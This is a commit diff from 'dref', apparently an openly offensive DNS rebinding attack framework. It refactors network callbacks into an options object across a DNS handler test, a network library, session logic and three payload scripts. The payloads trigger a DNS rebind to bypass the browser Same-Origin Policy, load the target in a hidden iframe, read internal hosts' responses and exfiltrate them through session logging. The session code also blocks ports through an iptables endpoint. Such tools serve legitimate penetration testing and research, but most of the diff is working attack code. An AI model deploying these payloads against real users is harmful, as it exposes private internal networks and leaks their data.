use curly braces to pass network get and post callbacks

Author: serain

dref/dns/tests/dns/handler.test.js

@@ -136,3 +136,20 @@ test('returns answer with defined address for A record when rebind', async () =>
  expect(answer.addresses).toEqual(['1.2.3.4'])
  })
 })
+
+test('returns answer with two addresses for dual record', async () => {
+ global.config = { general: { domain: 'hello.com', address: '10.0.0.1' } }
+ const handler = new DNSHandler()
+ const rinfo = { address: '127.0.0.1', port: '1234' }
+ // $ dig a z.hello.com @localhost
+ const queryData = Buffer.from([
+ 0xaa, 0xaa, 0x01, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
+ 0x01, 0x7a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x03, 0x63, 0x6f, 0x6d,
+ 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x29, 0x10, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00
+ ])
+
+ await handler.query(queryData, rinfo).then(answer => {
+ expect(answer.addresses).toEqual(['10.0.0.1', '1.2.3.4'])
+ })
+})

dref/scripts/src/libs/network.js

@@ -1,6 +1,6 @@
 import IPCIDR from 'ip-cidr'
 
-export function postJSON (url, data, successCb, failCb) {
+export function postJSON (url, data, { successCb, failCb, timeoutCb } = {}) {
  const xhr = new XMLHttpRequest()
 
  xhr.onreadystatechange = function () {
@@ -11,12 +11,16 @@ export function postJSON (url, data, successCb, failCb) {
  }
  }
 
+ xhr.ontimeout = function () {
+ timeoutCb()
+ }
+
  xhr.open('POST', url, true)
  xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8')
  xhr.send(JSON.stringify(data))
 }
 
-export function get (url, successCb, failCb, timeoutCb) {
+export function get (url, { successCb, failCb, timeoutCb } = {}) {
  const xhr = new XMLHttpRequest()
 
  xhr.onreadystatechange = function () {
@@ -40,7 +44,7 @@ export function get (url, successCb, failCb, timeoutCb) {
  xhr.send()
 }
 
-export function post (url, data, successCb, failCb) {
+export function post (url, data, { successCb, failCb, timeoutCb } = {}) {
  const xhr = new XMLHttpRequest()
 
  xhr.onreadystatechange = function () {
@@ -53,6 +57,10 @@ export function post (url, data, successCb, failCb) {
  }
  }
 
+ xhr.ontimeout = function () {
+ timeoutCb()
+ }
+
  xhr.open('POST', url, true)
  xhr.setRequestHeader('Pragma', 'no-cache')
  xhr.setRequestHeader('Cache-Control', 'no-cache')

dref/scripts/src/libs/session.js

@@ -41,19 +41,23 @@ export default class Session {
  script: script || window.env.script,
  fastRebind: fastRebind,
  args: args
- }, () => {
- network.postJSON(this.baseURL + '/arecords', {
- domain: target + '.' + window.env.domain,
- address: address,
- port: port,
- dual: fastRebind
- }, () => {
- // create the iframe
- const ifrm = document.createElement('iframe')
- ifrm.setAttribute('src', 'http://' + target + '.' + window.env.domain + ':' + port)
- ifrm.style.display = 'none'
- document.body.appendChild(ifrm)
- })
+ }, {
+ successCb: () => {
+ network.postJSON(this.baseURL + '/arecords', {
+ domain: target + '.' + window.env.domain,
+ address: address,
+ port: port,
+ dual: fastRebind
+ }, {
+ successCb: () => {
+ // create the iframe
+ const ifrm = document.createElement('iframe')
+ ifrm.setAttribute('src', 'http://' + target + '.' + window.env.domain + ':' + port)
+ ifrm.style.display = 'none'
+ document.body.appendChild(ifrm)
+ }
+ })
+ }
  })
  }
 
@@ -63,41 +67,47 @@ export default class Session {
  network.postJSON(this.baseURL + '/arecords', {
  domain: window.env.target + '.' + window.env.domain,
  rebind: true
- }, () => {
- // block this port if we're doing fastRebind
- if (window.env.fastRebind) {
- network.postJSON(this.baseURL + '/iptables', {
- port: this.sessionPort,
- block: true
- })
+ }, {
+ successCb: () => {
+ // block this port if we're doing fastRebind
+ if (window.env.fastRebind) {
+ network.postJSON(this.baseURL + '/iptables', {
+ port: this.sessionPort,
+ block: true
+ })
+ }
  }
  })
 
  // wait for rebinding to occur
  const wait = (time) => {
- network.get(this.baseURL + '/checkpoint', function () {
- // success callback
- // if we're still getting a 200 OK on /checkpoint it means we're
- // doing slow-rebind and we've not yet rebinded
- window.setTimeout(() => {
- wait(time)
- }, time)
- }, function (code) {
- // fail callback
-
- // if we get an error code of 0 it means we're using fast-rebind
- // and we've not yet rebinded
- if (code === 0) {
+ network.get(this.baseURL + '/checkpoint', {
+ successCb: function () {
+ // success callback
+ // if we're still getting a 200 OK on /checkpoint it means we're
+ // doing slow-rebind and we've not yet rebinded
  window.setTimeout(() => {
  wait(time)
  }, time)
- } else {
- // if we're getting another error it means we've rebinded
- // (ie: the test path /checkpoint doesn't exist on the host)
- resolve()
+ },
+ failCb: function (code) {
+ // fail callback
+
+ // if we get an error code of 0 it means we're using fast-rebind
+ // and we've not yet rebinded
+ if (code === 0) {
+ window.setTimeout(() => {
+ wait(time)
+ }, time)
+ } else {
+ // if we're getting another error it means we've rebinded
+ // (ie: the test path /checkpoint doesn't exist on the host)
+ resolve()
+ }
+ },
+ timeoutCb: function () {
+ // timeout callback
  }
- }, function () {
- // timeout callback
  })
  }
  wait(1000)

dref/scripts/src/payloads/fast-rebind.js

@@ -22,15 +22,18 @@ async function mainFrame () {
 
 function rebindFrame () {
  session.triggerRebind().then(() => {
- network.get(session.baseURL + window.args.path, (code, headers, body) => {
- // success callback
- session.log({ code: code, headers: headers, body: body })
- session.done()
- }, (code, headers, body) => {
- // fail callback
- // (we still want to exfiltrate the response even if it's i.e. a 404)
- session.log({ code: code, headers: headers, body: body })
- session.done()
+ network.get(session.baseURL + window.args.path, {
+ successCb: (code, headers, body) => {
+ // success callback
+ session.log({ code: code, headers: headers, body: body })
+ session.done()
+ },
+ failCb: (code, headers, body) => {
+ // fail callback
+ // (we still want to exfiltrate the response even if it's i.e. a 404)
+ session.log({ code: code, headers: headers, body: body })
+ session.done()
+ }
  })
  })
 }

dref/scripts/src/payloads/fetch-page.js

@@ -16,13 +16,16 @@ async function mainFrame () {
 
 function rebindFrame () {
  session.triggerRebind().then(() => {
- network.get(session.baseURL + window.args.path, (code, headers, body) => {
- // success callback
- session.log({ code: code, headers: headers, body: body })
- }, (code, headers, body) => {
- // fail callback
- // (we still want to exfiltrate the response even if it's i.e. a 404)
- session.log({ code: code, headers: headers, body: body })
+ network.get(session.baseURL + window.args.path, {
+ successCb: (code, headers, body) => {
+ // success callback
+ session.log({ code: code, headers: headers, body: body })
+ },
+ failCb: (code, headers, body) => {
+ // fail callback
+ // (we still want to exfiltrate the response even if it's i.e. a 404)
+ session.log({ code: code, headers: headers, body: body })
+ }
  })
  })
 }

dref/scripts/src/payloads/web-discover.js

@@ -26,9 +26,11 @@ function rebindFrame () {
  // After this we'll have bypassed the Same-Origin Policy
  session.triggerRebind().then(() => {
  // We can now read the response across origin...
- network.get(session.baseURL, (code, headers, body) => {
- // ... and exfiltrate it
- session.log({ code: code, headers: headers, body: body })
+ network.get(session.baseURL, {
+ successCb: (code, headers, body) => {
+ // ... and exfiltrate it
+ session.log({ code: code, headers: headers, body: body })
+ }
  })
  })
 }